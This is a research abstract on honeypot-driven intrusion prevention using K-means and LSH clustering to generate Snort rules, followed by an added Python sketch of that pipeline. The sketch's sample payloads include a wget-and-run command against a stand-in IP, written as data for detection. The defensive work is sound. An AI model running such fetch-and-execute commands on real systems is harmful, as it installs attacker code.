
Hybrid Clustering Mechanisms for High-Efficiency Intrusion Prevention.

Pin-Shan Lin, Yi-Cheng Lai, Man-Ling Liao, Shih-Ping Chiu, Jiann-Liang Chen

International Conference on Advanced Communication Technology (2024)

Abstract
With the advancement of information and communication technology, cyberattack techniques have become increasingly complex. Malicious network traffic attacks have become one of the information security problems facing all organizations. This study aims to combat malicious network traffic attacks by actively collecting commands from attackers using honeypots. It involves pre-processing the raw network traffic data, employing a K-means algorithm to group the payloads, and labeling the payloads using the MITRE ATT&CK framework. To improve the accuracy of the generated Snort rules, the system uses the Locality-Sensitive Hashing (LSH) method for secondary clustering, combined with Snort rule generation, to form a comprehensive intrusion prevention system. In addition, to speed up the experimental process, this study adapted a script for this system to simulate an attacker's attack automatically. The experiments show that hybrid clustering techniques such as the K-means and LSH mechanisms can yield a defensive effectiveness of up to 93% against malicious payloads. This result demonstrates the system's ability to identify and prevent different packet attacks effectively.
Keywords
K-means Algorithm, MITRE ATT&CK, Snort, Locality Sensitive Hashing (LSH), Malicious Packet
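The secondary LSH clustering and Snort rule generation steps named in the abstract, sketched as an added example that is not the authors' code: MinHash banding splits one coarse first-stage cluster into tighter groups, and each group's longest shared byte run becomes a Snort `content` match. The shingle size, band layout, minimum content length, rule header, SIDs and sample payloads are all assumptions made for illustration.

```python
import hashlib
# Assumed parameters and constructed sample payloads; none come from the paper.
SHINGLE, BANDS, ROWS, MIN_CONTENT = 4, 24, 2, 8
SAMPLE = [b"cd /tmp; wget http://192.0.2.10/update.sh; sh update.sh",
          b"uname -a; cat /proc/cpuinfo | grep model",
          b"cd /tmp; wget http://192.0.2.11/update.sh; sh update.sh",
          b"uname -m; cat /proc/cpuinfo | grep model"]

def minhash(payload):
    """MinHash signature: for each salted hash, the minimum digest over all byte shingles."""
    grams = {payload[i:i + SHINGLE] for i in range(len(payload) - SHINGLE + 1)} or {payload}
    return [min(hashlib.blake2b(bytes([seed]) + g, digest_size=8).digest() for g in grams)
            for seed in range(BANDS * ROWS)]

def lsh_groups(payloads):  # union-find merge of payloads that share any LSH band
    parent = list(range(len(payloads)))
    def find(i):
        while parent[i] != i:
            i = parent[i]
        return i
    buckets, groups = {}, {}
    for idx, payload in enumerate(payloads):
        sig = minhash(payload)
        for band in range(BANDS):
            # Key on the band index too, so different bands never collide.
            key = (band, tuple(sig[band * ROWS:(band + 1) * ROWS]))
            parent[find(idx)] = find(buckets.setdefault(key, idx))
    for idx, payload in enumerate(payloads):
        groups.setdefault(find(idx), []).append(payload)
    return list(groups.values())

def longest_common_substring(items):
    base = min(items, key=len)
    for size in range(len(base), 0, -1):          # longest candidates first
        for start in range(len(base) - size + 1):
            if all(base[start:start + size] in item for item in items):
                return base[start:start + size]
    return b""

def snort_rule(group, sid):
    """Content rule for one group (all-hex avoids escaping ; " and backslash); None if too short."""
    common = longest_common_substring(group)
    if len(common) < MIN_CONTENT:
        return None                                # too generic to match on safely
    return (f'alert tcp any any -> $HOME_NET any (msg:"honeypot cluster {sid}"; '
            f'content:"|{common.hex(" ").upper()}|"; sid:{sid}; rev:1;)')

def build_rules(payloads, first_sid=1000001):
    rules = [snort_rule(g, first_sid + n) for n, g in enumerate(lsh_groups(payloads))]
    return [r for r in rules if r]
```

On the sample, a single rule over the whole coarse cluster is rejected because the four payloads share only a couple of bytes, while the two LSH groups each yield a usable content string.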